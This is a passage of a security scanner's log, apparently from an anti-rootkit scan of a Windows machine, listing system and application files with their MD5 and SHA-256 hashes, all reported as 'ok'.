15:33:59.0372 0x04bc  C:\Windows\SysWOW64\usp10.dll - ok
15:33:59.0374 0x04bc  [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] C:\Windows\System32\provsvc.dll
15:33:59.0374 0x04bc  C:\Windows\System32\provsvc.dll - ok
15:33:59.0376 0x04bc  [ 9DC80A8AAAAAC397BDAB3C67165A824E, 051636BFDFF7AB0E4191354E846BD0DACCA1A01FCC13C1AFED91D8DBFE17127A ] C:\Windows\SysWOW64\msvcrt.dll
15:33:59.0376 0x04bc  C:\Windows\SysWOW64\msvcrt.dll - ok
15:33:59.0378 0x04bc  [ 0E4F83AACE4581FB3F0DF59D5256E8EF, B5BBA6115E8982AB182CD7648A1F9737CAA91A0358584CAC6063B5402C5D9288 ] C:\Windows\SysWOW64\advapi32.dll
15:33:59.0378 0x04bc  C:\Windows\SysWOW64\advapi32.dll - ok
15:33:59.0380 0x04bc  [ D8BED6BA298DBAAF6F3D746739FCD333, 83A40845EC448943F4737B730F95860983919677D84922E44EED4BECDFA71A31 ] C:\Windows\SysWOW64\rpcrt4.dll
15:33:59.0380 0x04bc  C:\Windows\SysWOW64\rpcrt4.dll - ok
15:33:59.0382 0x04bc  [ CFC97F07904067A1E5FAE195D534DA3A, EB4D2D127312EB09E2ACCA3276779E80F90FAF77322684BABF72B8EC6E1F906C ] C:\Windows\SysWOW64\sechost.dll
15:33:59.0382 0x04bc  C:\Windows\SysWOW64\sechost.dll - ok
15:33:59.0383 0x04bc  [ F08F6FCD09F9BE94C37ACC1B344685FF, DE48D766258B46EFEAB16579421C4BD97ACC6883F782D00E9857F4A0CE7E8A34 ] C:\Windows\SysWOW64\cryptbase.dll
15:33:59.0383 0x04bc  C:\Windows\SysWOW64\cryptbase.dll - ok
15:33:59.0385 0x04bc  [ 10826DA2FC073702AEAB93AF3D73B066, 1B55FE13B52109F1E427FCE6F64A02CF37AB6732BE4C968479BD871DE1D38A06 ] C:\Windows\SysWOW64\sspicli.dll
15:33:59.0385 0x04bc  C:\Windows\SysWOW64\sspicli.dll - ok
15:33:59.0387 0x04bc  [ 522B0466ED967A0762E9AF5B37D8F40A, B14C62D059BC7CF430E1B0F6E18E31EFD1959EFB3025A2B0EBB11751F38DD6D4 ] C:\Windows\System32\esent.dll
15:33:59.0387 0x04bc  C:\Windows\System32\esent.dll - ok
15:33:59.0389 0x04bc  [ 79A6F8E9FAC1C5AF940F1408A065CA9C, AEC78F026DFF049F4D8AC805DB069735AF077E6071E8E4C580157D3CD21B320D ] C:\Windows\SysWOW64\shell32.dll
15:33:59.0389 0x04bc  C:\Windows\SysWOW64\shell32.dll - ok
15:33:59.0391 0x04bc  [ 8CC3C111D653E96F3EA1590891491D71, 1D326D7D116D76876EE2B14A5BFB7B4328E21DB9B5AAAB9CB67F8EFB93924230 ] C:\Windows\SysWOW64\shlwapi.dll
15:33:59.0391 0x04bc  C:\Windows\SysWOW64\shlwapi.dll - ok
15:33:59.0392 0x04bc  [ 928CF7268086631F54C3D8E17238C6DD, F058FAFB04E7EBD5CADE9B48195B7AA7C3508F332A89F5E6E5F3F071E8CADD4A ] C:\Windows\SysWOW64\ole32.dll
15:33:59.0392 0x04bc  C:\Windows\SysWOW64\ole32.dll - ok
15:33:59.0394 0x04bc  [ 6C765E82B57F2E66CE9C54AC238471D9, 97F410023F5C08B4BC5DBF89A642200E76F4025ADD9707C24FD89D673675BB43 ] C:\Windows\SysWOW64\oleaut32.dll
15:33:59.0394 0x04bc  C:\Windows\SysWOW64\oleaut32.dll - ok
15:33:59.0396 0x04bc  [ CC09E0C9A2D89C6E71D093DC8BD121B7, 5F92457E27D817541EBA92FED984D2E6C1E35AD4E4E4CAE0F0778B795C260FAA ] C:\Windows\SysWOW64\crypt32.dll
15:33:59.0396 0x04bc  C:\Windows\SysWOW64\crypt32.dll - ok
15:33:59.0398 0x04bc  [ 938F39B50BAFE13D6F58C7790682C010, 902000EE51EFEABAF6A4B30F880AA37083D2232C6FC622CA513C4A823390FEDA ] C:\Windows\SysWOW64\msasn1.dll
15:33:59.0398 0x04bc  C:\Windows\SysWOW64\msasn1.dll - ok
15:33:59.0400 0x04bc  [ 68EAAEDF0365168B804E8728368FA946, 1FA25087E8B247B099B729F780DBF24F77FD34F58186A1C94329261CF3D18B8E ] C:\Windows\SysWOW64\wintrust.dll
15:33:59.0400 0x04bc  C:\Windows\SysWOW64\wintrust.dll - ok
15:33:59.0402 0x04bc  [ B3892E6DA8E2C8CE4B0A9D3EB9A185E5, AE163388201EF2F119E11265586E7DA32C6E5B348E0CC32E3F72E21EBFD0843B ] C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcr90.dll
15:33:59.0402 0x04bc  C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcr90.dll - ok
15:33:59.0404 0x04bc  [ A6F09E5669D9A19035F6D942CAA15882, 68C8AF0CC1923E3A7245392F2480EE665D265DF300A609D2540BF7C6D9C1A1BE ] C:\Windows\SysWOW64\imm32.dll
15:33:59.0404 0x04bc  C:\Windows\SysWOW64\imm32.dll - ok
15:33:59.0406 0x04bc  [ C9618BC9B2B0FD7C1138D8774795A79B, 0AC170669C2626519FA7A745C56BFBA6B83B8537488F5B9EB7BA72448E5E7A43 ] C:\Windows\SysWOW64\msctf.dll
15:33:59.0406 0x04bc  C:\Windows\SysWOW64\msctf.dll - ok
15:33:59.0408 0x04bc  [ A3F027C7969EF3816AB3557EDFB3CEE5, A93FCCB49E53295163E2F7441348E3C762FCB104ADD6427EAE6034B1A9D89652 ] C:\Windows\SysWOW64\AMInit32.dll
15:33:59.0408 0x04bc  C:\Windows\SysWOW64\AMInit32.dll - ok
15:33:59.0410 0x04bc  [ 650D03E40F93FAE323CB841F80368E5C, F67B97CFDCE2EE9294977725268EFDB0DD724BD16E7ED5BFCA45375AA8EBA5BB ] C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
15:33:59.0410 0x04bc  C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe - ok
15:33:59.0412 0x04bc  [ BC83108B18756547013ED443B8CDB31B, B2AD109C15EAA92079582787B7772BA0A2F034F7D075907FF87028DF0EAEA671 ] C:\Windows\SysWOW64\msvcp100.dll
15:33:59.0412 0x04bc  C:\Windows\SysWOW64\msvcp100.dll - ok
15:33:59.0414 0x04bc  [ 0E37FBFA79D349D672456923EC5FBBE3, 8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18 ] C:\Windows\SysWOW64\msvcr100.dll
15:33:59.0414 0x04bc  C:\Windows\SysWOW64\msvcr100.dll - ok
15:33:59.0416 0x04bc  [ 29158B1DC3F86D4B0D6A127FE586ADFF, 03C17FA518200CE5C53AED55C5AF22D0A2D483110FB1E7EA6F990C56936570E6 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AppleVersions.dll
15:33:59.0416 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AppleVersions.dll - ok
15:33:59.0418 0x04bc  [ 702254574E7E52052DE39408457B7149, 645CA9E88DA21C63710A04A0F54421018DF415A3D612112C71A255C49325C082 ] C:\Windows\SysWOW64\version.dll
15:33:59.0418 0x04bc  C:\Windows\SysWOW64\version.dll - ok
15:33:59.0419 0x04bc  [ 05F620B4B2E7DEB9409C0C6A4FEDD2A4, 19C5EBCE5F4B574402F0F4802C93824B0763DD2C972E146E26B85C0960A05185 ] C:\Windows\System32\adsldpc.dll
15:33:59.0419 0x04bc  C:\Windows\System32\adsldpc.dll - ok
15:33:59.0421 0x04bc  [ 4D0AA539EFBECC4114031FC1C33F7345, 3D118504FAEE76BA5CE83650409C9BBD472D129B9CDBDBB7C27A5376D76A923F ] C:\Windows\System32\appmgmts.dll
15:33:59.0421 0x04bc  C:\Windows\System32\appmgmts.dll - ok
15:33:59.0423 0x04bc  [ 69754747274B76E7FAF287239333D7E6, A0BAEC1E56E4B1A17C0D41B317526AF5BB11E7E488C7016067A6229346A23B16 ] C:\Windows\System32\msiltcfg.dll
15:33:59.0423 0x04bc  C:\Windows\System32\msiltcfg.dll - ok
15:33:59.0425 0x04bc  [ 3B39F9D51E4D8BAABDA6518955B58C13, 64AE407FA65096D5483C31B14AAC7FA691A4736AEA1288DC6D4BCEE3A2CE8A6F ] C:\Windows\System32\msi.dll
15:33:59.0425 0x04bc  C:\Windows\System32\msi.dll - ok
15:33:59.0426 0x04bc  [ CEBC197727D87B89645F7181FD877B48, BECC29BB2A47FF70944481B7859464CBE0F71DFB5B5CA75466FFB20CB4FF9245 ] C:\Windows\System32\atieclxx.exe
15:33:59.0426 0x04bc  C:\Windows\System32\atieclxx.exe - ok
15:33:59.0428 0x04bc  [ 9BC8610C32C96A2983A65DC21CAFA921, 2A4195F663C9D55939E3D8FEAA208090FDB0B8801A60164A7325B53104797CBC ] C:\Windows\System32\UXInit.dll
15:33:59.0428 0x04bc  C:\Windows\System32\UXInit.dll - ok
15:33:59.0430 0x04bc  [ 4CA9B9C94B7138E09B17F8AA31DD61D0, 073C5EC001BD6DE1FC56EAAA44D3AE15EB8CE32EC008C019AB83420450145618 ] C:\Windows\System32\atiadlxx.dll
15:33:59.0430 0x04bc  C:\Windows\System32\atiadlxx.dll - ok
15:33:59.0432 0x04bc  [ D97507C17A3351DB5632C620DE5FAD19, F06A3A4E3B80252603583F7F35B18E0FD98A776887CDD00C978020DF2984E713 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\YSCrashDump.dll
15:33:59.0432 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\YSCrashDump.dll - ok
15:33:59.0434 0x04bc  [ 005D62E870F103E9EE427724D9DC3BF4, 8494BAC665D88C3317BF7BD2ED4E3B9F2F4C4190934954AC5F25FD46E1BB90BF ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreFoundation.dll
15:33:59.0434 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreFoundation.dll - ok
15:33:59.0436 0x04bc  [ 7FF15A4F092CD4A96055BA69F903E3E9, 1B594E6D057C632ABB3A8CF838157369024BD6B9F515CA8E774B22FE71A11627 ] C:\Windows\SysWOW64\ws2_32.dll
15:33:59.0436 0x04bc  C:\Windows\SysWOW64\ws2_32.dll - ok
15:33:59.0438 0x04bc  [ 8CA0A722526DE3FC8D09700B0E017ECA, 4FFC16982F38A27C75ED659FD2DDB034686B0D92D0492C4BC913A2382FDC6C58 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\objc.dll
15:33:59.0438 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\objc.dll - ok
15:33:59.0440 0x04bc  [ 6377051C63D5552A311935C67E9FDFDC, 3FB82988AAB66813567E8DB951D4EE87F156201070F005FDBF52EF998A323E65 ] C:\Windows\SysWOW64\nsi.dll
15:33:59.0440 0x04bc  C:\Windows\SysWOW64\nsi.dll - ok
15:33:59.0442 0x04bc  [ 8EAEB0ED23A98DE0F0C812D756E47CE9, D49AB526C0B0356AB1F778E3B6AFC4D148742942F8561C9C4C2183A649661A86 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ASL.dll
15:33:59.0442 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ASL.dll - ok
15:33:59.0444 0x04bc  [ 534DE277E2719093EB1AFC3EE3307A07, A7B036005D7C401466EECBE1C86A6EFE12CBFA3375EA51F74B7FB9C8CA6DF10E ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libdispatch.dll
15:33:59.0444 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libdispatch.dll - ok
15:33:59.0446 0x04bc  [ D5AEFAD57C08349A4393D987DF7C715D, C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201 ] C:\Windows\SysWOW64\winmm.dll
15:33:59.0446 0x04bc  C:\Windows\SysWOW64\winmm.dll - ok
15:33:59.0448 0x04bc  [ BCE7DD8098CE6DD28EE2B0D5D5028B47, C48E1E455A0C6FC351CA2A8938C78D6D278B753FA7A621628B4E843C3A8F02FE ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libicuin.dll
15:33:59.0448 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libicuin.dll - ok
15:33:59.0450 0x04bc  [ 922563953E405AA9762F90778B711F77, 3DD35372DFC79F309BF419E9BF0043D1B1E00EDC47DCFF4D669416BDD5B094C5 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libicuuc.dll
15:33:59.0450 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libicuuc.dll - ok
15:33:59.0452 0x04bc  [ 54023DF1A9A7D481B4762B09ECCA330F, 271B46804B2E944B7ABF707939CB498AE78B0EE6DDCE318E26BE0C7BA826DFA3 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\icudt49.dll
15:33:59.0452 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\icudt49.dll - ok
15:33:59.0454 0x04bc  [ C733D233B623B7FFCE5031E4B756EE26, 33CC8B140B0E4A9B702E3468BE2646AEE4273F20C6EA5BAC6C3D8FC8EDEF0881 ] C:\Windows\SysWOW64\profapi.dll
15:33:59.0454 0x04bc  C:\Windows\SysWOW64\profapi.dll - ok
15:33:59.0456 0x04bc  [ D67DAA3998EFC0982B051A16A83FDE14, 7C0FA323C97A05B204E4236CC774B60D468FB2B87E7FBA5132AEEC14DA78A5A6 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\pthreadVC2.dll
15:33:59.0456 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\pthreadVC2.dll - ok
15:33:59.0458 0x04bc  [ C16F9A340AC46A8F835CC496B6F3A4E7, 65CD7C5F3A37E929E690557D418427D56E3CF501BA6381F79DE5F21B1FF9C95D ] C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService_main.dll
15:33:59.0458 0x04bc  C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService_main.dll - ok
15:33:59.0460 0x04bc  [ 10FB16B50AFFDA6D44588F3C445DC273, 6CDA17DA9B44D11E69F7C6682FA633EA75731623BB21B429A0FE2086ED4495A7 ] C:\Windows\SysWOW64\setupapi.dll
15:33:59.0460 0x04bc  C:\Windows\SysWOW64\setupapi.dll - ok
15:33:59.0463 0x04bc  [ F436E847FA799ECD75AD8C313673F450, 3C8BF3F0C08C7FA8DE5CD9C60AD9D00B742E84EB1FEBEEBA0F7159844BAAA471 ] C:\Windows\SysWOW64\cfgmgr32.dll
15:33:59.0463 0x04bc  C:\Windows\SysWOW64\cfgmgr32.dll - ok
15:33:59.0465 0x04bc  [ 2EEFF4502F5E13B1BED4A04CCAD64C08, 209FF1B6D46D1AC99518FCF54F2F726143B2DBF2C5FDA90212FBEF7526F7CBF5 ] C:\Windows\SysWOW64\devobj.dll
15:33:59.0465 0x04bc  C:\Windows\SysWOW64\devobj.dll - ok
15:33:59.0466 0x04bc  [ D15618A0FF8DBC2C5BF3726BACC75A0B, ADD81EA1D208907D67802F0E96EC0327BA89021F870BA22B9C7E3A19013A6AE7 ] C:\Windows\SysWOW64\userenv.dll
15:33:59.0466 0x04bc  C:\Windows\SysWOW64\userenv.dll - ok
15:33:59.0468 0x04bc  [ DF13A51A5C591887D2EC6AE64CEED0FA, DFD503AEBCAA056B2B0E669ACA52F6D26F4E6892F2DCFCCD902752C23A621653 ] C:\Windows\SysWOW64\wsock32.dll
15:33:59.0468 0x04bc  C:\Windows\SysWOW64\wsock32.dll - ok
15:33:59.0470 0x04bc  [ 062373995EAE5F0EAC9EAA9192136BFB, 0392D5656BD677C4C5CB74C96E7B85B0867F2535A37950AEC7F5C4A1A70D19AE ] C:\Windows\SysWOW64\dnssd.dll
15:33:59.0470 0x04bc  C:\Windows\SysWOW64\dnssd.dll - ok
15:33:59.0472 0x04bc  [ 6A6B2EE4565A178035BE2A4FF6F2C968, E2E231F1C2E2CE19583483ACC53318651FA7CA2DE46BCB89B4CBF97CA0525122 ] C:\Windows\SysWOW64\wtsapi32.dll
15:33:59.0472 0x04bc  C:\Windows\SysWOW64\wtsapi32.dll - ok
15:33:59.0474 0x04bc  [ E94C583CDE2348950155F2AF2876F34D, D00C7E0D665E467B712C68A446CC5BE14FDA743A2301878B3CEB72CDD0A8B8E7 ] C:\Windows\SysWOW64\mswsock.dll
15:33:59.0474 0x04bc  C:\Windows\SysWOW64\mswsock.dll - ok
15:33:59.0475 0x04bc  [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] C:\Program Files\Bonjour\mDNSResponder.exe
15:33:59.0475 0x04bc  C:\Program Files\Bonjour\mDNSResponder.exe - ok
15:33:59.0477 0x04bc  [ EE5C8E27C37B79CB54A2FCEEED2DC262, 0A5E200FD65A491756B951A4A0ED39B88B7B313E97C2BBF3C91AC4C290772BB7 ] C:\Windows\SysWOW64\WSHTCPIP.DLL
15:33:59.0477 0x04bc  C:\Windows\SysWOW64\WSHTCPIP.DLL - ok
15:33:59.0479 0x04bc  [ AD4524BF57249027759A426A450E085D, 3662D41C1B881F50232684388A60C91C3AB7A74D43F5881E4514F9A8A97970F8 ] C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\MobileDevice.dll
15:33:59.0479 0x04bc  C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\MobileDevice.dll - ok
15:33:59.0481 0x04bc  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] C:\Windows\System32\certprop.dll
15:33:59.0481 0x04bc  C:\Windows\System32\certprop.dll - ok
15:33:59.0483 0x04bc  [ B3B9E14680EF3501068C50DCF7E6981F, BD0DCB88944B21BF6BE945DC2866945497C1F89C734D338003E298648B9CD1F4 ] C:\Windows\SysWOW64\wininet.dll
15:33:59.0483 0x04bc  C:\Windows\SysWOW64\wininet.dll - ok
15:33:59.0485 0x04bc  [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] C:\Windows\System32\dps.dll
15:33:59.0485 0x04bc  C:\Windows\System32\dps.dll - ok
15:33:59.0487 0x04bc  [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] C:\Windows\System32\FDResPub.dll
15:33:59.0487 0x04bc  C:\Windows\System32\FDResPub.dll - ok
15:33:59.0489 0x04bc  [ 6B400F211BEE880A37A1ED0368776BF4, 2F27C6FA96A1C8CBDA467846DA57E63949A7EA37DB094B13397DDD30114295BD ] C:\Windows\System32\cryptsvc.dll
15:33:59.0489 0x04bc  C:\Windows\System32\cryptsvc.dll - ok
15:33:59.0491 0x04bc  [ A6B726DCA228F7878E38368A1BDC68BE, 30E8300B09B876E3D4B2A9215C9CC070EADF915E1268F425B6F8E0596A0D3539 ] C:\Windows\System32\cryptnet.dll
15:33:59.0491 0x04bc  C:\Windows\System32\cryptnet.dll - ok
15:33:59.0492 0x04bc  [ 1E2A51DB8B28CD431D2B5C76A71AAEE3, A356E381C155DF7D3E905696D63A652D1C01D524B6B866C2288ECC5F3B3D4AB9 ] C:\Windows\System32\IKEEXT.DLL
15:33:59.0492 0x04bc  C:\Windows\System32\IKEEXT.DLL - ok
15:33:59.0494 0x04bc  [ 77B5035BC6EDF4D1B6265391AECEE4C0, FE69B715F04446BD42AF1B672E6AC54E954CFE0C847BFD2056CB11CF017B1844 ] C:\Windows\System32\vpnikeapi.dll
15:33:59.0494 0x04bc  C:\Windows\System32\vpnikeapi.dll - ok
15:33:59.0496 0x04bc  [ 6A13B4F3B3F575F1E24B877B9359AABA, 676AD5F8F709D4A9DCE9938D82DEEE329C9A385A6969C169B3DF37AA75F1E4C7 ] C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll
15:33:59.0496 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll - ok
15:33:59.0498 0x04bc  [ 6951562DC4625EEFC6EACD52AD165866, 44A0B3EA0232D613A5B4115492DF2A7CEF25B35300E6A3E3E50C9544C5D1049E ] C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
15:33:59.0498 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll - ok
15:33:59.0500 0x04bc  [ 589CBC4989F750E1DA35625AB481CF43, B93E1B8C3775F9C995FD5451C685A06DEFD24AE1DF0DD99D19D5E4B9AC0010F9 ] C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll
15:33:59.0500 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll - ok
15:33:59.0502 0x04bc  [ 3BE0D923AA45A4DBE091C2D84F0B4FE7, 603EEC55D6F646150FC3F0F2C939CFE434C02FC7A7AB23B1FEC8B5C77E4C8381 ] C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll
15:33:59.0502 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll - ok
15:33:59.0504 0x04bc  [ 2E33DFD10F28F86C3FC40EE123CC3904, 57C65671A04EFCA437A69E8E97B2FCA17897EE4608C7DB69F77D44FBD3490B50 ] C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll
15:33:59.0504 0x04bc  C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll - ok
15:33:59.0506 0x04bc  [ C8E7CBB6E1D0E7C82F40316F5A289F4A, A24545858BCF19E6544989612F3A029BE652F2CB5A75E98B1978F63FD41C3B1F ] C:\Windows\SysWOW64\iertutil.dll
15:33:59.0506 0x04bc  C:\Windows\SysWOW64\iertutil.dll - ok
15:33:59.0508 0x04bc  [ 725AB72D5DD462F2EDAF1A6C59C8CFB5, 2420B0D7D132444E79B646787B1B6D89F45C6188E03FC1A4467B154D4774EFC3 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
15:33:59.0508 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll - ok
15:33:59.0510 0x04bc  [ 0E2F58F6E698EDCB9E58FAD0CBCD0567, 426FB40A065FEF61980C803EF72D0D326C623340C3AE99CA8AFFDEFB81E8D49D ] C:\Windows\System32\vssapi.dll
15:33:59.0510 0x04bc  C:\Windows\System32\vssapi.dll - ok
15:33:59.0511 0x04bc  [ 287923557447D7E4BDD7E65B1F0F5428, 14D85A0F036F28D77AA9723C3D7E8C4DA9BDFF8A1AD9BEA6FE5756DBF5D00F08 ] C:\Windows\System32\vsstrace.dll
15:33:59.0512 0x04bc  C:\Windows\System32\vsstrace.dll - ok
15:33:59.0513 0x04bc  [ F1B205F932F62F94506A5F332C895DAF, F02F01F20F655DD919C71AE814E4C3DD43330AAD1425FC5B1497F1613917CCDE ] C:\Windows\System32\WSDApi.dll
15:33:59.0513 0x04bc  C:\Windows\System32\WSDApi.dll - ok
15:33:59.0515 0x04bc  [ C55516D98DD5D8F0153C2A9B4227DA86, DBC62B776CF06D0873A4C7CFCDF5B6F5C6E6C41917C326C090BCE58DC66EE09C ] C:\Windows\System32\webservices.dll
15:33:59.0515 0x04bc  C:\Windows\System32\webservices.dll - ok
15:33:59.0517 0x04bc  [ 5B9282F1BF7C34A93A282EC4D6918E12, DF1E5BF60296A05DDD72D3B0F1DF98174DA0FC6D99BB3D85964C9CF967C24137 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.dll
15:33:59.0517 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.dll - ok
15:33:59.0519 0x04bc  [ B5055B51BAA0FD0A736A88653DA3C1C0, A3BD057C7E8C926930BA7E9D11427D26FB37267026A0B72AB4021101EE424F74 ] C:\Windows\System32\fundisc.dll
15:33:59.0519 0x04bc  C:\Windows\System32\fundisc.dll - ok
15:33:59.0521 0x04bc  [ A90DC9ABD65DB1A8902F361103029952, 26798758976CE53251AC342B966BE0363AE1794BD965C452F5DEBC33E18969F0 ] C:\Windows\SysWOW64\IPHLPAPI.DLL
15:33:59.0521 0x04bc  C:\Windows\SysWOW64\IPHLPAPI.DLL - ok
15:33:59.0523 0x04bc  [ CFF35B879D1618D42C86644C717BA947, 1837275202628D3320867A3BF8CFDA15491730C4B74215F7C0D7E140BF01AC3C ] C:\Windows\SysWOW64\winnsi.dll
15:33:59.0523 0x04bc  C:\Windows\SysWOW64\winnsi.dll - ok
15:33:59.0525 0x04bc  [ C0C76975DD290A1BD76141B8CE9A083F, 8CA422D8643394C66DCBD75FABC6E2A34771E45BE75B75BFFF2EF899D2AC532D ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
15:33:59.0525 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll - ok
15:33:59.0526 0x04bc  [ 58F4493BF748A3A89689997B7BD00E95, EC5DEEC73E357C7C87B001275C4E635011A9CF39419F2B86E2C2B8D7E388C551 ] C:\Windows\System32\winhttp.dll
15:33:59.0526 0x04bc  C:\Windows\System32\winhttp.dll - ok
15:33:59.0528 0x04bc  [ 603EBD34E216C5654A2D774EAC98D278, ACE0171BB780DB2C1B1A8BF6FA8CF51C529D7E09141FA504C7199AF764FD9A36 ] C:\Windows\System32\webio.dll
15:33:59.0528 0x04bc  C:\Windows\System32\webio.dll - ok
15:33:59.0530 0x04bc  [ BCEA9AB347E53BC03B2E36BE0B8BA0EF, 868DEFB78767E91694E83F931725257DF3FF79A4BFED3B914D27F3493EB7A8D0 ] C:\Windows\System32\httpapi.dll
15:33:59.0530 0x04bc  C:\Windows\System32\httpapi.dll - ok
15:33:59.0532 0x04bc  [ 0E3A7EC2B9590EA7767BBB1823630DEA, 6858B7050465DB8505CF9E932868B123B925376C05363EA5A9198B2AE15CF728 ] C:\Windows\System32\msxml6.dll
15:33:59.0532 0x04bc  C:\Windows\System32\msxml6.dll - ok
15:33:59.0534 0x04bc  [ 57A6362D71B5003C48EE21F2DBB624B1, E6480D1F219BF3F8E7AC8347A8C50E48632B7BBC9618EEB36DAEA1079AA770B5 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\SQLite3.dll
15:33:59.0534 0x04bc  C:\Program Files (x86)\Common Files\Apple\Apple Application Support\SQLite3.dll - ok
15:33:59.0536 0x04bc  [ B353F1834FCD36D77BE3F74992C147D4, BFBC42B500FC7D6D2B523F988DD54156D2B6132CBE366EB591BF45556959A8E9 ] C:\Program Files\Intel\iCLS Client\HeciServer.exe
15:33:59.0536 0x04bc  C:\Program Files\Intel\iCLS Client\HeciServer.exe - ok
15:33:59.0538 0x04bc  [ 5B7DE9D87B9D2713BDD6A53678DC2A49, E7A0D68FA2ED2730640F40FF59338BE173C8973BFC38286E6320CA332A39C204 ] C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
15:33:59.0538 0x04bc  C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe - ok
15:33:59.0540 0x04bc  [ B40420876B9288E0A1C8CCA8A84E5DC9, 0D3C73B45BC708D7B1E26DFB6D4F64031A998548FEA0FB5CE198ED716F7DC9A0 ] C:\Windows\SysWOW64\dnsapi.dll
15:33:59.0540 0x04bc  C:\Windows\SysWOW64\dnsapi.dll - ok
15:33:59.0542 0x04bc  [ 73E8667A19FEEDD856DF2695E9E511D4, 68D66C36D1F293D10ADCC6A33C870F989A29743537592CF172F02E794BEAFD1C ] C:\Windows\SysWOW64\wship6.dll
15:33:59.0542 0x04bc  C:\Windows\SysWOW64\wship6.dll - ok
15:33:59.0544 0x04bc  [ 40947436A70E0034E41123DF5A0A7702, 5D40FD92DA5CA59C1BADB58AD509DB6A6D613F18660A9A270A53ECA85D34C3A9 ] C:\Program Files (x86)\Bonjour\mdnsNSP.dll
15:33:59.0544 0x04bc  C:\Program Files (x86)\Bonjour\mdnsNSP.dll - ok
15:33:59.0545 0x04bc  [ 1727B2A2F379A32B864C096FA794AADC, 87B77A5DF95F3A1C5ED6DEF820C7E384BEFCBAA2FE1BB4781AC6F777A081E5CC ] C:\Windows\System32\aepic.dll
15:33:59.0545 0x04bc  C:\Windows\System32\aepic.dll - ok
15:33:59.0547 0x04bc  [ C6DCD1D11ED6827F05C00773C3E7053C, EA23BE261C9C04F44215D254D7A80FD0AEE84C6F192D0FEE49A7CF74ED3CB1A6 ] C:\Windows\System32\sfc.dll
15:33:59.0547 0x04bc  C:\Windows\System32\sfc.dll - ok
15:33:59.0549 0x04bc  [ E68B1AEB0C7A1D6F2977F8A94937255F, E9809D5C921C916E5BFA8488D5F94FF0301022A767D5F25838ABF4676C5147FA ] C:\Windows\SysWOW64\FWPUCLNT.DLL
15:33:59.0549 0x04bc  C:\Windows\SysWOW64\FWPUCLNT.DLL - ok
15:33:59.0551 0x04bc  [ ED6EE83D61EBC683C2CD8E899EA6FEBE, F82592908D038C44D9F2E5C5B7BC663A2D370FC565F40420E1138A9E55F0E7EB ] C:\Windows\SysWOW64\rasadhlp.dll
15:33:59.0551 0x04bc  C:\Windows\SysWOW64\rasadhlp.dll - ok
